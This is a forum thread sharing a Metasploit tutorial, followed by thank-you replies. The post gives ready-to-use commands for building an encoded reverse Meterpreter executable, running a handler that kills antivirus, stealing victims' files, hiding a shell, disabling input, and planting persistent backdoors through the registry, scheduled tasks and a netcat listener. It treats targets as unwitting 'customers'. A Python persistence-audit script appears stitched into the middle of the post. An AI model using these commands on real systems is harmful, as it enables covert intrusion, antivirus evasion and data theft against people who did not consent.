
Thread: Another TuT on metasploit. All my cheat notes :)


  1. #1
    Junior Member
    Join Date
    Dec 2007
    Posts
    76

    Another TuT on metasploit. All my cheat notes :)

    I introduce my tutorial on the Metasploit Framework. This applies to both Linux and Windows.
    Although, I would seriously suggest using Metasploit within Linux, specifically
    'Backtrack 4 - PreRelease' (The Latest)


    If you don't know what the metasploit framework is, then look it up. You've been missing out.

    In no way is this meant to be a comprehensive guide. MSF is HUGE. Too many things can be done with it,
    you could write 15 books on it. MSF is Open Source and coded in the Ruby language.

    Get used to the 'help' option!

    PAYLOADs
    ========

    I'm gonna start with Payloads, many people know already that MSF is an exploitation framework, as in you can
    work out vulnerabilities in software, and use the framework to quickly create working exploits for it.
    There's hundreds of payloads that you can choose from, so that when you exploit the system in question
    you can easily automate the execution of a payload of your choice on the machine.

    I will show you how to turn those payloads into an actual .EXE so it will just run as is.

    Ok. Lets begin:


    Fire up your MSF, make sure it's updated, as they are constantly making amendments to this.
    For backtrack I think it's: cd pentest/exploits/framework3

    Metasploit Double Encoded Reverse Meterpreter Payload
    ====================================================


    $ ./msfpayload windows/meterpreter/reverse_tcp LHOST=<your external IP> LPORT=82 R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o /meterpreter_reverse.exe

    LHOST - is our machine (listening host), as we are waiting for a connection from RHOST (remote host)

    LPORT - self explanatory. Just make sure you have port forwarding set up on your router of course.

    Meterpreter - An incredibly advanced shell which kind of simulates bash. (even on a win system) - lots of power.
    You'll see how much power shortly.


    Now you have your PAYLOAD.exe

    Metasploit Listener
    ===================


    In /framework3 directory

    $ ./msfconsole
    (Takes a lil minute for this to load)

    use exploit/multi/handler (Sets the exploit to a handler)
    set PAYLOAD windows/meterpreter/reverse_tcp (Most common Payload to use, try experimenting with others)
    set LHOST 192.162.1.50 (Make sure you set LHOST to your address on Network and not localhost)
    set LPORT 82 (Sometimes, port 80, 443 or 8080 is better as to some FW's it looks less suspicious)
    set ExitOnSession false (As soon as you get a session, it doesn't automatically jump in to it)
    set AutoRunScript /killav.rb (when customer connects back, and meterpreter payload is uploaded, killav.rb script is uploaded and executed)
    exploit -j (sets exploit up as a job, good for shells on multiple customers)


    (See more on scripts... down )


    Continuation
    ============


    When all goes well, and you have hit 'exploit -j' and have waited for a customer to click on the payload.exe you created earlier,
    you will see stuff happening in the screen. You will notice it run the killav script, then says something like:


    [*] Meterpreter session 1 opened (123.234.345.567:63456 -> 192.168.1.50:82)


    Ok, here's the basics:

    type :

    sessions -l (this lists any sessions we have i.e. customers. Notice the lowercase L)
    sessions -i 1 (this is to interact with session 1. i.e. Interact. Lowercase I)

    If you need to come out of this screen. Either CTRL+Z or type 'background' without the ''


    Ok.. So we are in the session: Brilliant


    Continuation - The Good Stuff
    =============================


    $ Meterpreter > getuid (this will show you the currently logged in user)
    $ Meterpreter > idletime (wanna see how long the user has been afk?)

    $ Meterpreter > help (this will show you a massive list of amazing commands to use!)
    $ Meterpreter > use priv (then check help again, more privileged commands now eh?)


    ok i will show some really handy ones


    $ Meterpreter > upload evil.exe evil.exe (uploads the file from this machine over to the customer)
    $ Meterpreter > download secret.txt secret.txt (downloads the txt file to our machine)

    $ Meterpreter > cd "Documents and settings" (cd's to a folder with spaces in it.)
    $ Meterpreter > ls (this is an example of the bash type commands we have on the target win machine, version of dir)

    $ Meterpreter > download -r "My Documents" /home/root/Documents (This would download the entire "My Docs" folder over to us.)

    $ Meterpreter > execute -f evil.exe (executes the file on the customer)


    $ Meterpreter > execute -f cmd.exe -c -H -i (-f executes, cmd.exe shell on target, channelized, hidden, interactive)
    (customer will not see a thing you're doing as all the options are set properly)

    Check down the bottom for some useful cmd.exe commands that are very useful


    $ Meterpreter > uictl disable keyboard (disables some user interface components)
    $ Meterpreter > uictl disable mouse
    $ Meterpreter > uictl enable keyboard (enables)

    $ Meterpreter > ps (this will show you a detailed list of all processes running on target machine)

    $ Meterpreter > migrate pid (migrates/injects itself into another process id) e.g migrate 716 (explorer.exe)
    $ Meterpreter > kill pid (kills process) e.g. kill 563 (av.exe goes down)


    etc etc etc etc....


    Using Payload As A Backdoor
    ===========================


    upload /home/metabkdr.exe metabkdr.exe (to app data directory)

    execute -f cmd.exe -c -H -i

    Way 1 :
    cmd.exe > REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe" /f

    (This adds a registry startup obviously)
    Way 2 :
    cmd.exe > at 19:00 /every:M,T,W,Th,F cmd /c start "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe"

    (runs backdoor at 7pm all weekdays, at command works for all windows i think)

    way 3 :
    cmd.exe > SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe" /ED 11/11/2011

    (This runs the backdoor every 45 mins as SYSTEM (on XP. XP home doesn't have schtasks, has 'at' though)

    Plant A Simple Backdoor with Netcat
    ===================================


    plant a backdoor
    A very simple way of planting backdoor could be using netcat.
    steps:
    1. upload a netcat executable (nc.exe) on remote machine.
    meterpreter provides a command 'upload' for that
    2. c:\windows\system32 > nc.exe -l -L -p <port number> -e cmd.exe
    3. now from your machine, type nc -v -n <ip address> <port>
    It will give you a command shell of remote machine

    nc -l -d -p 80 -e c:\windows\system32\cmd.exe


    More On Scripts:
    ================

    Scripts can be run from the meterpreter shell when you have a shell on a customer.

    All you do is: (where '$' is not to be typed. This is the bash shell)

    $ run scraper -h (This will show you the options etc for any of the scripts)
    or
    $ run keylogrecorder -h


    The sky is your limit when it comes to scripts. You can code them to do all sorts of stuff for you.
    There are many already within the framework, made by folk.. here's a small list of some already there:


    killav.rb (kills all anti viruses running on system)
    getcountermeasure.rb (kills av's and fw's/ids')
    scraper.rb (logs LOADS of useful information via a series of automated commands on customer. Logs stored in /root/.msf3/)
    gettelnet.rb (able to open a telnet server on the customer with a username and password)
    checkvm.rb (checks to see if it is a VM. And version numbers)


    netenum.rb
    search_dwld.rb
    winbf.rb
    credcollect.rb
    hostsedit.rb
    remotewinenum.rb
    keylogrecorder.rb
    scheduleme.rb
    winenum.rb
    getgui.rb
    schtasksabuse.rb
    wmic.rb
    get_local_subnets.rb
    migrate.rb


    Credits: backtrack forums / metasploit /irongeek
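    From the defender's side, the "Using Payload As A Backdoor" section above amounts to two persistence mechanisms worth auditing on any Windows box: a Run key value and a scheduled task, both pointing at an executable under a user-writable directory and both named to look like a security component ("firewall"). The following Python is an added example, not code from the post or from the Metasploit project: it parses constructed samples of `reg query` output for the HKCU Run key and of `schtasks /query /fo CSV /v` output (only a subset of the verbose columns is included, and the sample rows are made up for illustration) and flags entries that match those traits. The directory list, the look-alike names and the `audit_persistence` function name are my own assumptions, not anything the page or Windows defines.

```python
import csv
import io
import re

# Constructed sample of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
# output. The "firewall" value mirrors the persistence entry described in the post.
SAMPLE_RUN_KEY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    firewall    REG_SZ    C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe
"""

# Constructed sample of `schtasks /query /fo CSV /v` output, reduced to four of the
# verbose columns. The FIREWALL task mirrors the SCHTASKS example in the post.
SAMPLE_SCHTASKS_CSV = """\
"TaskName","Run As User","Task To Run","Schedule Type"
"FIREWALL","SYSTEM","C:\\Documents and Settings\\Owner\\Application Data\\Microsoft\\Installer\\metabkdr.exe","Minute"
"Defrag","SYSTEM","C:\\WINDOWS\\system32\\defrag.exe C:","Weekly"
"""

# Assumed heuristics: directories a normal user can write to, and names that
# imitate security or system components. Tune these for your environment.
USER_WRITABLE = re.compile(r"\\(application data|appdata|local settings|temp)\\", re.IGNORECASE)
LOOKALIKE_NAMES = {"firewall", "antivirus", "windows update", "svchost"}


def parse_run_key(text):
    """Parse `reg query` output lines of the form '<name>  REG_xx  <data>'."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"^\s+(.+?)\s{2,}(REG_\w+)\s{2,}(.+?)\s*$", line)
        if m:
            entries.append({"name": m.group(1), "type": m.group(2), "command": m.group(3)})
    return entries


def parse_schtasks_csv(text):
    """Parse the CSV form of `schtasks /query` into dicts keyed by column header."""
    return list(csv.DictReader(io.StringIO(text)))


def assess(name, command, run_as=None):
    """Return the list of reasons an autostart entry looks like planted persistence."""
    reasons = []
    if USER_WRITABLE.search(command):
        reasons.append("executable lives in a user-writable directory")
        if run_as and run_as.upper() == "SYSTEM":
            reasons.append("runs as SYSTEM from that directory")
    if name.strip().lower() in LOOKALIKE_NAMES:
        reasons.append("name imitates a security or system component")
    return reasons


def audit_persistence(run_key_text, schtasks_csv_text):
    """Combine Run-key and scheduled-task checks into one list of findings."""
    findings = []
    for e in parse_run_key(run_key_text):
        reasons = assess(e["name"], e["command"])
        if reasons:
            findings.append({"source": "HKCU Run key", "name": e["name"],
                             "command": e["command"], "reasons": reasons})
    for row in parse_schtasks_csv(schtasks_csv_text):
        reasons = assess(row["TaskName"], row["Task To Run"], row["Run As User"])
        if reasons:
            findings.append({"source": "scheduled task", "name": row["TaskName"],
                             "command": row["Task To Run"], "reasons": reasons})
    return findings


def audit_samples():
    """Run the audit over the constructed samples above."""
    return audit_persistence(SAMPLE_RUN_KEY, SAMPLE_SCHTASKS_CSV)


if __name__ == "__main__":
    for f in audit_samples():
        print(f"[{f['source']}] {f['name']}: {f['command']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

    On a real host you would feed it the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (and the HKLM equivalent) and `schtasks /query /fo CSV /v` instead of the samples; the `at` job from "Way 2" shows up in `at` or `schtasks` output as well and is caught by the same path heuristic. The heuristics are deliberately simple: the point is that a launcher living under Application Data, especially one running as SYSTEM or named after a security product, deserves a second look.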

  2. #2
    Good friend of the forums spawn's Avatar
    Join Date
    Jan 2010
    Posts
    280


    Congratulations !


  3. #3
    Junior Member
    Join Date
    Jan 2010
    Posts
    42


    Quite handy, thanks.

    I am feeling outdated on scripts part.

  4. #4
    Junior Member Isohump's Avatar
    Join Date
    Sep 2009
    Posts
    63


    Great job keep it up.. >_<
    One day your life will flash before your eyes. Make sure its worth watching.

  5. #5
    Member Mr-Protocol's Avatar
    Join Date
    Jan 2010
    Location
    Ohio
    Posts
    142


    Great information. Thanks.

  6. #6
    Junior Member
    Join Date
    Sep 2009
    Posts
    43


    Good stuff, thank you!

  7. #7
    Just burned his ISO MacHacker's Avatar
    Join Date
    Apr 2008
    Location
    Andover, MA
    Posts
    1

    Great tutorial

    Thanks for the tutorial. very well detailed. Works great on my Virtual Machine running Windows XP SP3.

  8. #8
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    2

    Thanks

    Wow thanks man i was looking for something like this

  9. #9
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    11

    meterpreter transferring files

    hi there, i have not been able to get upload to work. i get error "no such file or directory".
    Now is there anything else i need to do in bt4 ?
    i am trying to send files to a w2k sp4 wrk station i have 11 sessions open
    i have tried a few different versions of the upload command but none work.

    many thanks in advance
    also i could not tftp to bt4 to GET files either.

  10. #10
    Junior Member
    Join Date
    Feb 2010
    Location
    On Planet Earth
    Posts
    29


    thank you very much for this, but I've got two questions:
    1) we must use port forwarding to our listener machine, right?
    2) why does LHOST in the two commands differ?

    thanks...
